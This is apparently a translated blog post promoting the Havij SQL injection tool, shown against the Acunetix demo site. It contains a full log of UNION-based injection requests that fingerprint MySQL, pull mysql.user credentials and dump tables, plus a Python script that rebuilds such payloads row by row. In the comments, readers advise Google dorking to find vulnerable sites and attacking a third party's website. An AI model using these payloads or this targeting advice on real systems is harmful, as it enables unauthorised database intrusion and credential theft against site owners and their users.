Exploit SQL injections easily with Havij

Havij is a tool that makes exploiting SQL injection vulnerabilities in web applications easy. In no time you can fingerprint the database, retrieve the users and their password hashes, list tables and columns, dump data, run SQL statements and even reach the file system and execute commands on the operating system.

We recommend trying the free 1.15 version: it has some limitations, but it will certainly be useful and will give you an idea of how easy the tool is to use.

As a starter, in this post we will take a quick look at how it works against the Acunetix demo site. To begin we only need to identify an injection point, here by appending a single quote to the parameter and checking that the application complains with a MySQL error:
http://testphp.vulnweb.com/artists.php?artist=1'

Then enter the URL in the Target field to start extracting data:

You will quickly see how, in the blink of an eye, we transparently obtain tables, columns, data and so on. Using Havij does make you feel like a script kiddie, but we can always intercept the requests and study some of its SQL injections:

1 GET http://testphp.vulnweb.com:80/artists.php?artist=1 HTTP/1.1     => HTTP/1.1 200 OK     [0.781 s]
3 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9 HTTP/1.1 => HTTP/1.1 200 OK [0.359 s]
4 GET http://testphp.vulnweb.com:80/artists.php?artist=1+and+1%3D1 HTTP/1.1 => HTTP/1.1 200 OK [0.407 s]
5 GET http://testphp.vulnweb.com:80/artists.php?artist=1+and+1%3E1 HTTP/1.1 => HTTP/1.1 200 OK [0.219 s]
6 GET http://testphp.vulnweb.com:80/artists.php?artist=1+and+1%3D1 HTTP/1.1 => HTTP/1.1 200 OK [0.344 s]
7 GET http://testphp.vulnweb.com:80/artists.php?artist=1%27 HTTP/1.1 => HTTP/1.1 200 OK [0.235 s]
8 GET http://testphp.vulnweb.com:80/artists.php?artist=%2F*%2130000+1*%2F HTTP/1.1 => HTTP/1.1 200 OK [0.516 s]
9 GET http://testphp.vulnweb.com:80/artists.php?artist=%2F*%2140100+1*%2F HTTP/1.1 => HTTP/1.1 200 OK [0.469 s]
10 GET http://testphp.vulnweb.com:80/artists.php?artist=%2F*%2150000+1*%2F HTTP/1.1 => HTTP/1.1 200 OK [0.297 s]
11 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.219 s]
12 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.313 s]
13 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.266 s]
14 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.312 s]
15 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.25 s]
16 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.296 s]
17 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28version%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.375 s]
18 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.234 s]
19 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28system_user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.219 s]
20 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28%40%40hostname+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.187 s]
21 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28%40%40basedir+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.281 s]
22 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28user+as+char%29%29%29%2C0x3a%2Cunhex%28Hex%28cast%28password+as+char%29%29%29%2C0x3a%2Cunhex%28Hex%28cast%28host+as+char%29%29%29%2C0x27%2C0x7e%29+from+mysql.user+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.219 s]
23 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28GRANTEE+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.user_privileges+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.312 s]
24 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28GRANTEE+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.user_privileges+limit+1%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.203 s]
25 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28schema_name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.schemata+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.406 s]
26 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28schema_name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.schemata+limit+1%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.328 s]
27 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28schema_name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.schemata+limit+2%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.297 s]
28 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28schema_name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.schemata+limit+3%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.266 s]
29 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x616375617274%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.297 s]
30 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28group_concat%28table_name%29+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x616375617274%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.422 s]
31 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Ccount%28column_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.columns+where+table_schema%3D0x616375617274+and+table_name%3D0x61727469737473%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.281 s]
32 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28group_concat%28column_name%29+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.columns+where+table_schema%3D0x616375617274+and+table_name%3D0x61727469737473%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.282 s]
33 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Ccount%28*%29%2C0x27%2C0x7e%29+from+%60acuart%60.artists%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.25 s]
34 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28artists.artist_id+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60acuart%60.artists+Order+by+artist_id+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.234 s]
35 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28artists.artist_id+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60acuart%60.artists+Order+by+artist_id+limit+1%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.187 s]
36 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28artists.artist_id+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60acuart%60.artists+Order+by+artist_id+limit+2%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.281 s]
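To see what Havij is really doing in that log, here is an added Python example (not part of the original post and not Havij's own code) that decodes the `artist` parameter from proxy log lines like the ones above, rebuilds the UNION payloads with the same filler marker and ~'...'~ delimiters, and parses the delimited value back out of a page. The three log lines are copied from the log above; the response body is constructed for the example, not a real capture.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Havij sends this MySQL hex literal (the string "1025480056") in every UNION
# column it is not using, so it can tell which column ends up rendered.
FILLER = "0x31303235343830303536"

# Request lines copied from the proxy log above (requests 8, 15 and 29).
LOG_LINES = [
    "8 GET http://testphp.vulnweb.com:80/artists.php?artist=%2F*%2130000+1*%2F HTTP/1.1 => HTTP/1.1 200 OK [0.516 s]",
    "15 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.25 s]",
    "29 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x616375617274%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.297 s]",
]

# Constructed response body (not a real capture): artists.php echoing the
# injected column into the page next to one of the filler columns.
SAMPLE_BODY = "<h2>~'acuart'~</h2>\n<p>1025480056</p>\n"

LOG_RE = re.compile(r"^\d+\s+GET\s+(\S+)\s+HTTP/1\.\d\s+=>\s+HTTP/1\.\d\s+(\d{3})")
DELIM_RE = re.compile(r"~'(.*?)'~", re.S)
HEX_RE = re.compile(r"0x(?:[0-9A-Fa-f]{2})+")


def parse_log_line(line):
    """Return (url, status) from a proxy log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return (m.group(1), int(m.group(2))) if m else None


def raw_parameter(url, name="artist"):
    """URL-decode the injected parameter exactly as the server sees it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)[name][0]


def hex_literal_to_text(lit):
    """MySQL hex literal 0x616375617274 -> 'acuart'."""
    return bytes.fromhex(lit[2:]).decode("latin-1")


def decode_payload(url, name="artist"):
    """Injected SQL with hex literals turned back into quoted strings, for reading."""
    return HEX_RE.sub(lambda m: repr(hex_literal_to_text(m.group(0))),
                      raw_parameter(url, name))


def wrap(expr):
    """concat(0x7e,0x27,<expr>,0x27,0x7e) renders as ~'value'~ so the value can
    be located in arbitrary HTML; unhex(Hex(cast(... as char))) avoids charset
    and collation mismatches between the UNION columns."""
    return f"concat(0x7e,0x27,unhex(Hex(cast({expr} as char))),0x27,0x7e)"


def union_payload(expr, columns, position=1):
    """999999.9 matches no artist, so only the UNION row is rendered; `expr`
    goes in column `position`, the filler literal everywhere else."""
    cols = [FILLER] * columns
    cols[position - 1] = expr
    return "999999.9 union all select " + ",".join(cols) + "--"


def row_payload(column, table, row, columns, where=None):
    """One row per request with LIMIT <row>,1, the way Havij walks
    information_schema and then the application tables."""
    cond = f" where {where}" if where else ""
    return union_payload(f"(select {wrap(column)} from {table}{cond} limit {row},1)", columns)


def extract_value(body):
    """Pull the ~'...'~ delimited value out of a response body."""
    m = DELIM_RE.search(body)
    return m.group(1) if m else None


def decode_log(lines):
    """Decode every matching request line into readable SQL."""
    return [decode_payload(p[0]) for p in map(parse_log_line, lines) if p]


if __name__ == "__main__":
    for sql in decode_log(LOG_LINES):
        print(sql)
    print(row_payload("schema_name", "`information_schema`.schemata", 2, 3))
    print(extract_value(SAMPLE_BODY))
```

Reading the decoded log this way makes the phases obvious: requests 4 to 7 are boolean checks (`and 1=1` versus `and 1>1`), 8 to 10 fingerprint the MySQL version with `/*!30000 1*/` style conditional comments, 11 to 13 grow the UNION until three columns fit, and from 14 on each request pulls a single value out between the `~'` and `'~` delimiters.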

3 comments:

  1. How do you know that is an injection point?
    That is, how do you detect it?

    1. Because the URL generates a warning: mysql_fetch_array, as you can see in the image. That is one way to detect it.

  2. A tip. Use a "dork". A dork is searching Google for vulnerable pages. If, for example, your target is someone involved in paedophilia and you have discovered their website, let's say papaya.com for instance, since we are looking for MySQL in PHP, type the dork into Google: papaya? =id? for example. When a result is id=3, for example, put a single quote ' at the end of the URL; if it throws a (MySQL error) the page is vulnerable and you can put the URL in Havij's Target.
